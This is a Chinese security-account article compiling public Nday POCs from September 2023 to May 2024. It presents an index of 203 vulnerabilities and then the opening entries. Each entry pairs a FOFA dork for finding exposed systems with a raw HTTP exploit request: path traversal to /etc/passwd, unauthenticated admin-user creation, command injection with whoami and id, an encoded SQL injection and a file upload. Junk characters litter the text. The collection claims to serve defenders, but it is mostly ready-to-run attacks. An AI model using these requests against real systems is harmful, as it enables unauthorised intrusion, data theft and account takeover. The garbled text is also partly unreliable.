互联网公开漏洞整理202309-202406
, ], E" q5 z: R# t0 E$ k% U道一安全 2024-06-05 07:41 北京+ V! D5 {; |, J0 t% V, x4 `7 A
以下文章来源于网络安全新视界 ,作者网络安全新视界
8 S5 p5 n" v: v0 `5 b' p
# j3 [) w: x9 D" i- j发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。+ K+ z) k5 T% j% V
+ ?: T* d6 J X4 y- ~6 o
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. I- Z- [- c9 `( e% l% e" J) T ^, t/ u" s' j
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
' g1 @6 r* ?8 m |% ^
- l' p9 q. I, {+ B文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。! O- y4 i7 @7 H: U4 `0 I$ b& z
& e+ T0 O4 f8 b) [7 R$ K合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。' l+ i ?. J. F. @
. m7 X2 r: A. C8 V+ e9 a
. B. H3 s, f4 G- j1 i- a7 T声明, H- }4 K; L) I" `5 g
) x. z, S, F9 w8 c2 l. B1 C2 O* c9 j为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。. T, r& r$ ^' `: _$ N
* K4 x. K& k) D; ^) [
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
# f8 \/ Z: P& q- B0 V. B7 T8 o, F- n5 b7 f( U
- T- `: R2 t3 r) C2 R+ L; `2 U
1 Q& @$ X4 P7 P. }. v
目录
# @ X, L6 F: @0 j& J+ v# X6 d, x' |& F" v; @6 ~+ d5 p5 M
01/ k# N, R4 Z, o2 }4 n6 z, n/ K
2 S) R D3 S6 E t0 \
1. StarRocks MPP数据库未授权访问
5 f6 q8 j2 E, J- f3 m0 \2. Casdoor系统static任意文件读取1 K8 S, s/ c2 E/ I- t
3. EasyCVR智能边缘网关 userlist 信息泄漏
; x9 K0 S; |2 U4. EasyCVR视频管理平台存在任意用户添加' X. C3 }+ ~0 w8 ^% e, }
5. NUUO NVR 视频存储管理设备远程命令执行
- r# m! y/ ?' W6 E2 n; A0 q6. 深信服 NGAF 任意文件读取
8 S; D% L' r- O% `9 ^$ @7 Q7. 鸿运主动安全监控云平台任意文件下载
6 X0 Y0 t' c: _8. 斐讯 Phicomm 路由器RCE! u) i+ C( P' r
9. 稻壳CMS keyword 未授权SQL注入
. s" @8 B; ?; U7 X0 A& t @10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
& r+ a4 X! }: d, ?. l( U11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
/ v2 {$ R6 c+ K% Z2 a2 Q P: c12. Jorani < 1.0.2 远程命令执行
* X, [! U* g T4 ~, Q3 H, t13. 红帆iOffice ioFileDown任意文件读取
9 u4 J* [ P' M5 f( H& `" k# ~& \% M14. 华夏ERP(jshERP)敏感信息泄露, y, Z, |2 G( e& p5 g3 m
15. 华夏ERP getAllList信息泄露
3 V' O3 p) R' R3 W' p16. 红帆HFOffice医微云SQL注入. u* q# q3 U! V+ Y' Z, U
17. 大华 DSS itcBulletin SQL 注入( R( O6 k0 ~7 W2 T1 {5 T
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
# Y: \+ f6 W9 _( G4 [# X0 ~0 [' F19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入, ~' P4 A) Z! C/ J; U8 J
20. 大华ICC智能物联综合管理平台任意文件读取
' w. R% c' [# |21. 大华ICC智能物联综合管理平台random远程代码执行5 L7 @3 t+ [4 T
22. 大华ICC智能物联综合管理平台 log4j远程代码执行3 S4 U' ~- \- ?$ y5 N
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行/ R, t3 R; k' h4 n0 F
24. 用友NC 6.5 accept.jsp任意文件上传0 z9 p. U. Z5 g# {- B6 b
25. 用友NC registerServlet JNDI 远程代码执行4 `! S& w6 h6 U7 H3 k
26. 用友NC linkVoucher SQL注入/ o! g/ K* J1 |+ A! ~, M7 E2 X
27. 用友 NC showcontent SQL注入
% r1 Q4 b" x% o28. 用友NC grouptemplet 任意文件上传
0 [, i4 c3 x. N a3 y0 g8 L. s/ Z29. 用友NC down/bill SQL注入, ~$ y; j2 ]8 A& O" }
30. 用友NC importPml SQL注入! a1 q% a5 _4 b Z8 l
31. 用友NC runStateServlet SQL注入: V# Q$ b5 O/ D! G' y# A
32. 用友NC complainbilldetail SQL注入
3 P+ J4 V% a: y( B) Q33. 用友NC downTax/download SQL注入
( ]0 M' }/ Y: P# i, @' {1 a/ T34. 用友NC warningDetailInfo接口SQL注入$ k, }( H) \) I
35. 用友NC-Cloud importhttpscer任意文件上传
: I% V1 U, k0 f2 n* j& j+ f36. 用友NC-Cloud soapFormat XXE
' F* D, |/ a9 @/ L37. 用友NC-Cloud IUpdateService XXE) f& |& a$ N4 @5 z* ]6 f
38. 用友U8 Cloud smartweb2.RPC.d XXE2 P9 c, O' d/ F7 B9 i' \
39. 用友U8 Cloud RegisterServlet SQL注入
$ N9 u0 T D3 ]; d* p; A40. 用友U8-Cloud XChangeServlet XXE$ l% Y+ J9 Q% ^! S% [) H& T
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
5 g# ]( U( p. |% g& h42. 用友GRP-U8 SmartUpload01 文件上传
$ C8 ^2 o; A) [43. 用友GRP-U8 userInfoWeb SQL注入致RCE% V/ N. |- `* I4 Y) o
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 _/ [- y4 ?( U9 W* t( X45. 用友GRP-U8 ufgovbank XXE9 F! _! y3 @$ t6 I8 `& q( M- _
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( E1 n, G% j( L+ r47. 用友GRP A++Cloud 政府财务云 任意文件读取) |& Q! S* N& k- \( Y3 X- u
48. 用友U8 CRM swfupload 任意文件上传
8 j9 R1 y( \' S49. 用友U8 CRM系统uploadfile.php接口任意文件上传
" z t2 c% D( @50. QDocs Smart School 6.4.1 filterRecords SQL注入2 \( D( |' k+ D! v4 u& i
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
" h- z% P Y- B( d5 P+ E. h) B52. 泛微E-Office json_common.php sql注入* i* x, i' k$ X/ W' Z6 f& U# z1 l
53. 迪普 DPTech VPN Service 任意文件上传$ `+ l5 j* T; T7 X6 |- B
54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 Q8 i$ ~) m5 k2 u& T& p
55. 畅捷通T+ getdecallusers信息泄露
$ t, W/ e% c- o56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, h3 s. {3 K7 g57. 畅捷通T+ keyEdit.aspx SQL注入, I& G/ L; B& V$ Z# p6 p7 {
58. 畅捷通T+ KeyInfoList.aspx sql注入
0 y8 b( Y% T; f1 y' k59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% @; Q8 I9 C% C60. 百卓Smart管理平台 importexport.php SQL注入# J6 \/ ]$ T* P6 s9 X
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& e5 [, j2 m5 @/ s- [ H62. IP-guard WebServer 远程命令执行. c1 E7 @0 V E: @* p. \! Z
63. IP-guard WebServer任意文件读取: Z% l, S, ]/ s% F; J+ i1 i
64. 捷诚管理信息系统CWSFinanceCommon SQL注入3 r( {! w/ c. }
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" p8 q Y* P6 H* f5 `' ?
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* m( g7 N" R4 b! M" C) f
67. 万户ezOFFICE wpsservlet任意文件上传
! ?4 m7 e/ H; z: P# `68. 万户ezOFFICE wf_printnum.jsp SQL注入, \' k# _! G" v- s6 C J# {' V I
69. 万户 ezOFFICE contract_gd.jsp SQL注入6 ^/ s; [* _& U! E) g8 T' O
70. 万户ezEIP success 命令执行
1 T. f3 H$ k" p: h7 w71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" t/ g: P" D/ N! Q: w6 T: C
72. 致远OA getAjaxDataServlet XXE
, `/ _7 B. d! X+ C; g73. GeoServer wms远程代码执行
6 Y! v( }( G$ O9 A% T; Z( G74. 致远M3-server 6_1sp1 反序列化RCE
6 E2 K8 A9 M0 x3 _) v, M75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
" w0 O* E6 E l/ |: g) H3 P, _76. 新开普掌上校园服务管理平台service.action远程命令执行
; P) H2 L6 c$ j1 o/ ~& W! z77. F22服装管理软件系统UploadHandler.ashx任意文件上传
3 Q. ^6 F8 b/ @4 ]' H& P- t78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传4 V/ V# e: v& m7 h U7 B9 ~
79. BYTEVALUE 百为流控路由器远程命令执行6 ?% u' |, O, I! r
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# F) X' }+ W9 z, W4 {4 W" p81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露, N; f% H, H; P. F9 Z/ U) a5 P7 h
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
( G5 N) o. D$ a( t83. JeecgBoot testConnection 远程命令执行
r% k/ x1 |" ?$ G84. Jeecg-Boot JimuReport queryFieldBySql 模板注入" n' W3 a/ Q0 }! d; v$ V; e
85. SysAid On-premise< 23.3.36远程代码执行
/ i8 {3 c ?5 G5 W86. 日本tosei自助洗衣机RCE
: B" e9 d2 }4 f" p4 h87. 安恒明御安全网关aaa_local_web_preview文件上传1 N9 V5 H0 @. v3 v; O" ?/ |
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
8 Y; a+ g% M7 k' k* `8 a89. 致远互联FE协作办公平台editflow_manager存在sql注入
5 a. h: g1 ], {. h4 s90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
$ @" H% r7 Z" Z) L' o91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取3 ^2 N! ^& \1 _8 X$ Z
92. 海康威视运行管理中心session命令执行
$ E4 h6 }4 s# e+ e ~. H" O93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. Y/ `: Y% ]" P0 _8 ~94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传+ Y7 H, ]/ I3 a. F/ y) V. m
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行6 W+ Q. u$ K0 e* ^+ H
96. Apache OFBiz 18.12.11 groovy 远程代码执行
4 g& s' f3 H& w) f, I" k& s97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: w' Y* o! @5 U. O- E
98. SpiderFlow爬虫平台远程命令执行
8 r( W) c4 K8 [& j) a99. Ncast盈可视高清智能录播系统busiFacade RCE* R: K4 U' B D' a! K* D
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 p; `/ s1 T% @; s3 F, C& L
101. ivanti policy secure-22.6命令注入
' H. J I8 e& E! z% \102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& R- S- [- G U5 W- {7 K
103. Ivanti Pulse Connect Secure VPN XXE
! Q) v- t p9 E$ M) `, ]# f( I104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. F, N3 E+ k5 i9 L105. SpringBlade v3.2.0 export-user SQL 注入
+ y4 i a: k: k! U8 E) W5 A106. SpringBlade dict-biz/list SQL 注入
2 `& B* W! |4 l) h$ m1 V4 A9 X& s107. SpringBlade tenant/list SQL 注入& R' @' i) M. L
108. D-Tale 3.9.0 SSRF+ ?9 b+ u/ v; ?7 E: s3 u
109. Jenkins CLI 任意文件读取
6 X1 ]% _, P' Q110. Goanywhere MFT 未授权创建管理员
: z" ^2 [. ~) O" `! E! x+ j9 E111. WordPress Plugin HTML5 Video Player SQL注入$ z2 C4 i \& U: ?% g
112. WordPress Plugin NotificationX SQL 注入
; s% @: ?' ^* L) M113. WordPress Automatic 插件任意文件下载和SSRF- M5 w, j8 p5 n6 I8 X
114. WordPress MasterStudy LMS插件 SQL注入
& Q0 d" w9 W, n2 Y115. WordPress Bricks Builder <= 1.9.6 RCE
8 b! A, |$ @6 E* ~116. wordpress js-support-ticket文件上传
: c1 e0 z: r5 x, H& G# `117. WordPress LayerSlider插件SQL注入
( z( t9 l- ~$ T ~% Q1 x* e8 N118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
" r5 k# O( v2 M% {119. 北京百绰智能S20后台sysmanageajax.php sql注入
- [) z' N7 l1 G) E4 k) {0 c120. 北京百绰智能S40管理平台导入web.php任意文件上传
5 C1 Y; i5 M8 r% a% W! b121. 北京百绰智能S42管理平台userattestation.php任意文件上传8 ^' ?7 r4 ?, R% w4 k( p1 e+ \. b
122. 北京百绰智能s200管理平台/importexport.php sql注入+ V5 N: I% w3 W5 u
123. Atlassian Confluence 模板注入代码执行( t; v" e' Q9 Y# I; E
124. 湖南建研工程质量检测系统任意文件上传
6 R, n% I) m7 y. t! u' q/ @125. ConnectWise ScreenConnect身份验证绕过 n1 m- l x& I0 o# K" H( Q5 v
126. Aiohttp 路径遍历; r9 V) g% ]* C9 i8 L+ c ` m
127. 广联达Linkworks DataExchange.ashx XXE
& ^9 e2 x) j; _+ C, r128. Adobe ColdFusion 反序列化
8 s( C) B4 C7 S- X129. Adobe ColdFusion 任意文件读取
9 E$ g! H+ i1 E! b: G6 e130. Laykefu客服系统任意文件上传
8 p5 R) q; s# S& m/ u131. Mini-Tmall <=20231017 SQL注入
, @* Z1 c7 F9 A" v6 M9 b132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过% z$ |5 ^' ?) [' b/ {% i
133. H5 云商城 file.php 文件上传; Y9 l& e5 {* L+ i: V' `7 O
134. 网康NS-ASG应用安全网关index.php sql注入, ?* J5 r; V' d$ Z2 I% C
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( Y% q0 y. H( k5 z2 w5 p
136. NextChat cors SSRF8 J1 d- l3 d: W
137. 福建科立迅通信指挥调度平台down_file.php sql注入* F' e4 A6 `/ e9 s3 ^+ M( T
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入* w4 \4 [+ r+ @7 K6 e
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* t- m& ^( p r6 F140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入$ P: t/ b0 O0 |6 {: V" v
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
, W) B. I. z4 m7 n142. CMSV6车辆监控平台系统中存在弱密码
8 I$ G ]* L0 M- t8 \( M143. Netis WF2780 v2.1.40144 远程命令执行
6 W3 i% c) n e7 q7 K6 g. v+ Q6 T144. D-Link nas_sharing.cgi 命令注入
) X$ Y/ r# b: p' z, z4 }145. Palo Alto Networks PAN-OS GlobalProtect 命令注入5 ^; M$ l! G. ?' A; r$ h$ X
146. MajorDoMo thumb.php 未授权远程代码执行" }3 A. G+ W A3 q% `0 A9 b1 x* T
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 a* P/ }! g$ x5 |148. CrushFTP 认证绕过模板注入
8 D8 x0 T/ n' v149. AJ-Report开源数据大屏存在远程命令执行
9 \1 ^2 |5 J# f1 d9 g1 |6 c" y$ S150. AJ-Report 1.4.0 认证绕过与远程代码执行& m2 D: P: [5 q% r8 q1 w9 D
151. AJ-Report 1.4.1 pageList sql注入
: \; c6 s: z0 `( x! S152. Progress Kemp LoadMaster 远程命令执行
$ s0 }- H2 S# P) {153. gradio任意文件读取
! i4 V t( E- R' R4 s154. 天维尔消防救援作战调度平台 SQL注入0 s6 \1 `: d9 I( q+ {; n/ L
155. 六零导航页 file.php 任意文件上传
9 n' `( r- T& G: I/ k156. TBK DVR-4104/DVR-4216 操作系统命令注入
' H0 O) r: H0 V* \8 ]+ `" s157. 美特CRM upload.jsp 任意文件上传
; \: l' ?: p! y5 J: s& D0 H) L158. Mura-CMS-processAsyncObject存在SQL注入7 U# Y4 K) b: `8 U4 Q6 V% b' Q9 x
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
$ b6 K5 x* S* V9 o160. Sonatype Nexus Repository 3目录遍历与文件读取
) o0 S5 d: U# ?. H# q- `) B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
3 `! x( y. ~* b- V. s162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
; T ~' h" g5 ?0 Y163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" D2 x5 \9 h1 t# Q164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
! c( q2 D* \! e% o$ e h$ D& `165. OrangeHRM 3.3.3 SQL 注入& B5 R* y" O: Z& _5 ?; _6 K3 U
166. 中成科信票务管理平台SeatMapHandler SQL注入/ N8 I+ Y! I2 U; C4 f; h5 M* H
167. 精益价值管理系统 DownLoad.aspx任意文件读取
( A g8 ~# m4 ~# {4 B168. 宏景EHR OutputCode 任意文件读取
3 }# Z- M1 W4 R; O1 O. b; _169. 宏景EHR downlawbase SQL注入
, p: c6 K# d7 d+ A+ \$ C170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 |+ O6 P3 _9 O& f1 ?* S9 {
171. 通天星CMSV6车载定位监控平台 SQL注入
" A+ e+ |1 e/ Z! S7 L172. DT-高清车牌识别摄像机任意文件读取
, {" ^; \3 c% X' s, C, z+ V/ e( |173. Check Point 安全网关任意文件读取2 Q$ C1 ~9 t" Y
174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ }. ^9 d- Q$ X/ S
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# y; \( H! q$ a& o; ~176. 电信网关配置管理系统 rewrite.php 文件上传
5 d6 K) a( E0 Q3 M6 U177. H3C路由器敏感信息泄露8 X& k$ `) G- a, t/ b/ M, r
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
+ h! u2 E- r) _' T3 a3 d179. 建文工程管理系统存在任意文件读取, M% s8 M) z- i! r1 q
180. 帮管客 CRM jiliyu SQL注入8 J" L/ m) Q* U: Z6 q% x4 m
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入& y8 p8 ^; F& U0 u' _1 M
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* I- {4 t+ P8 j& A* Q$ K! F( H; q
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入6 c* e* ]4 y7 R: S2 y+ \
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加0 c. e- L6 g5 a; W
185. 瑞友天翼应用虚拟化系统SQL注入
/ w1 I( y+ d+ M186. F-logic DataCube3 SQL注入* r" _2 c; _" j7 [5 d& y# L+ i: o
187. Mura CMS processAsyncObject SQL注入% G8 ?0 ~. W; |% w7 n2 C; P- |3 @: G
188. 叁体-佳会视频会议 attachment 任意文件读取. s9 o5 e/ N% j; m1 r1 Z8 N' x
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 Q2 l% p5 K6 J, l2 e7 c) n190. 短视频矩阵营销系统 poihuoqu 任意文件读取1 t0 H! y) y) A! S
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
5 `7 r! Z* Z3 W$ e" F" N8 P6 O192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 P ~% m, w# ^; `0 L/ [
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
# _" d' ]3 V. _5 z& w194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传( f9 @) U4 e( ^% n+ y
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
0 ^4 q: \& t1 u8 B$ m( x5 j196. 河南省风速科技统一认证平台密码重置& L# b: }4 Y' s: R& d! y$ X' `5 g" ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 U3 w( X+ d0 O( l: g& Z% c6 {
198. 阿里云盘 WebDAV 命令注入) | x1 J) a/ u
199. cockpit系统assetsmanager_upload接口 文件上传( i$ T( ~( m1 P' k+ y
200. SeaCMS海洋影视管理系统dmku SQL注入
+ q# |% a5 N8 x! E/ ^9 T, ?5 @201. 方正全媒体新闻采编系统 binary SQL注入& H1 J5 k' X* Y
202. 微擎系统 AccountEdit任意文件上传
4 J. V* l, X/ h) G5 a& y203. 红海云EHR PtFjk 文件上传
9 l% \3 _/ j; l W! ~* U' U& r
( j1 l0 t+ M( |! zPOC列表9 a6 ]7 v% N; {1 _; @( d/ X
0 x& r% H- W4 {9 g02
5 ^* R( t. z. `! ?& ^2 i1 c) i6 s. x6 ]
1. StarRocks MPP数据库未授权访问
# d: [; ]) R7 Y# ^" d9 e: kFOFA :title="StarRocks"( w( _4 N! r; @2 t8 X
GET /mem_tracker HTTP/1.16 m1 I$ `- L) `* t) t; d. L
Host: URL
( l0 W- T: |% ]8 M. e1 ]5 P# ^/ {
8 F( r; k+ W+ [
2. Casdoor系统static任意文件读取
! i+ y! H$ R; G; r% }8 p) u$ u+ {+ gFOFA :title="Casdoor"0 J# K5 } G# }+ d* y! w
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1; \5 t% [/ | w& R; ?1 ?( y
Host: xx.xx.xx.xx:9999
% c1 Y: z, ~4 e1 [; j. T. oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. h w' d. _" {, ?9 }) k5 x
Connection: close! @9 ~ \9 K7 [ r$ `& t
Accept: */*9 ~" N3 k) G/ |% f4 C1 J% |
Accept-Language: en% W. `0 a' }6 L! m3 F
Accept-Encoding: gzip; f/ I' Q4 V7 I1 j4 C- r! j
' ^0 u. I$ G6 v7 J
0 C4 Y) ?( \3 u+ \& @; ~! C3 C: ~
3. EasyCVR智能边缘网关 userlist 信息泄漏( N3 n& U$ J' M
FOFA :title="EasyCVR"
) Y! R$ H" P# j: pGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
' x0 b+ l6 T9 j F( n, ?Host: xx.xx.xx.xx- R) ]4 P6 V6 k% |) n/ g/ l
2 s7 \3 c% s: P/ d; r( s6 B1 j5 G
4. EasyCVR视频管理平台存在任意用户添加/ W" e0 \+ I |# V# L
FOFA :title="EasyCVR"
3 l: n' U! y6 {0 I% w
6 d5 j: K3 C; Y$ F" v1 o' Dpassword更改为自己的密码md5
9 m) r- B3 ]9 IPOST /api/v1/adduser HTTP/1.18 P. t( a& R7 a5 W. w3 X
Host: your-ip
) M! [5 {3 I* h! L9 f. N! {Content-Type: application/x-www-form-urlencoded; charset=UTF-8
' f3 F# z# c; s+ U0 V: {+ R
4 a3 n# L( g8 T3 y Jname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
( E5 l1 d' M. [5 q$ y( `' q. ?0 g
. d. P m3 p% c2 s, ?1 t5. NUUO NVR 视频存储管理设备远程命令执行* f) j. m; Q: _! r
FOFA:title="Network Video Recorder Login"
- b, O, \0 G# W! p" kGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1* X o6 h1 q0 O9 M# }; b
Host: xx.xx.xx.xx
3 N" t: [/ g3 Y% Q2 j( c+ q- v3 K9 `& S/ `" H9 e
" V! ?- M. C+ t+ b7 v6 d& d# O6. 深信服 NGAF 任意文件读取
- t( U) O/ z' ZFOFA:title="SANGFOR | NGAF"
5 G7 I* a3 J1 c( }. `( f' rGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
# q0 @0 J& j; N% k `Host:, P6 m( f m1 \2 K4 z4 L
: W+ L* k: `- u+ F" O' e- e. ] M
+ J) ^' a6 n* P! w& \7. 鸿运主动安全监控云平台任意文件下载
; Y1 x. ~2 V3 A$ hFOFA:body="./open/webApi.html"
7 ~6 L5 o% x6 |9 s E/ qGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1. m$ O5 W. u5 n3 I$ N! ] Q
Host:# [6 P; x$ j7 k9 U5 L8 q
/ D+ d" q; K( ?. s% t
# u# E- G4 f2 c z. J8. 斐讯 Phicomm 路由器RCE( ]2 C2 _& J- j; v0 C" F: ~7 a: E3 I
FOFA:icon_hash="-1344736688"1 J9 Q0 a }% A& `
默认账号admin登录后台后,执行操作' u" {% g1 |9 c0 I2 m9 H; m4 Z
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
) i' a: f5 R2 F/ G# y' r. M# k& ?Host: x.x.x.x7 a0 H0 p6 n# ~+ X
Cookie: sysauth=第一步登录获取的cookie
- B8 i. T: i- Y1 L ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
2 [. G0 b5 M# h) E/ JUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 O9 M% n7 A" @3 @
. W3 A7 t- o( \" l0 X( F8 S% h9 ~
------WebKitFormBoundaryxbgjoytz5 C0 E8 P& C* j, ~! @8 F7 |9 @& M
Content-Disposition: form-data; name="wifiRebootEnablestatus"
: d2 @4 F4 t7 e( ^; t3 M" W
3 S7 |* B5 G4 q%s0 R7 Q% E, |% u6 a. N
------WebKitFormBoundaryxbgjoytz; d8 J: l) v7 p5 L, ? y
Content-Disposition: form-data; name="wifiRebootrange" j. W/ [/ n% C( K% U, G2 i' P
0 B( _" T) S9 b$ y4 Y4 \6 y
12:00; id;
4 T; J3 v8 V9 |# [4 v4 y" W------WebKitFormBoundaryxbgjoytz/ X1 R' k+ x: h! [: ?1 I& X
Content-Disposition: form-data; name="wifiRebootendrange"; d3 G9 C6 k" H) C7 u3 ]: a
% u0 A+ g% |+ D4 W8 v5 Y$ [% h, E
%s:# ^7 w; ?" i/ r1 c+ e7 U$ A0 P8 s( [
------WebKitFormBoundaryxbgjoytz
' v, E7 x* l2 H9 ?0 gContent-Disposition: form-data; name="cururl2"
" B+ \6 g% Y1 p6 J; G$ u' j
, t/ e( x# o, t- j J
. K& `# ~. I2 k9 X3 |" w------WebKitFormBoundaryxbgjoytz--0 w" g" _) Q% p @# J' O
0 Q: `/ V+ b4 s* i
* Q0 O3 d& |7 a |2 i- E
9. 稻壳CMS keyword 未授权SQL注入
" [, N4 Z4 w4 _- |) ~+ j. ?FOFA:app="Doccms"
# I! _* y; n1 z( X: p# TGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
; G+ G, z6 }+ E [! B- ]0 A$ yHost: x.x.x.x
+ Y/ e' g: g) p" I4 J7 N! T; X
R" T+ E5 E& }" p
7 M* k/ x, n3 G+ Vpayload为下列语句的二次Url编码) U s4 C" a; x: \8 P
; e+ H( ?+ H7 |! ?/ X: |' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
; A$ a$ |7 w# ?# r" b
0 k/ K$ q I9 V$ ~# J# G0 x10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' D# l- m) I6 d. {+ s' C$ ]
FOFA:icon_hash="953405444"% U) f7 o1 G. g% e
- D/ W9 r' W) g
文件上传后响应中包含上传文件的路径& f* z2 F( J; d2 s: I- t" K1 G! U
POST /eis/service/api.aspx?action=saveImg HTTP/1.16 y4 [; W( r4 C8 G% b
Host: x.x.x.x:xx' K' k# Z" Q- `# z! H& B3 a2 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. j: R: [/ E. dContent-Length: 197, s% q F0 Q3 y2 H# W- K/ x1 E, g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ F0 \) t2 y1 B' H1 h
Accept-Encoding: gzip, deflate
/ H) k+ X% q; a ^! @+ |1 oAccept-Language: zh-CN,zh;q=0.9
2 S4 F9 d8 @8 ^' N) hConnection: close
% Q$ i$ u1 C+ J+ p' q0 l0 n: F% hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu# B- A }, u1 R `
: ]" u1 s2 O D" {* P0 _------WebKitFormBoundaryxdgaqmqu }9 I, W( C6 U0 ^. O
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
# m' v r* ~* Q0 x9 Q. t0 SContent-Type: text/html" C: p* H& L1 D2 [; W9 N
+ P$ g* U# s( x. ]; ~( I+ Gjmnqjfdsupxgfidopeixbgsxbf4 C) Y/ M1 Y% z8 f2 q
------WebKitFormBoundaryxdgaqmqu--
. k; S% H- s) o5 q9 R# B5 p0 p
" E8 N$ [; B5 |) f5 a# e8 ?( `0 ~! {& m
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
I" ?+ D g2 L A5 h* \. VFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
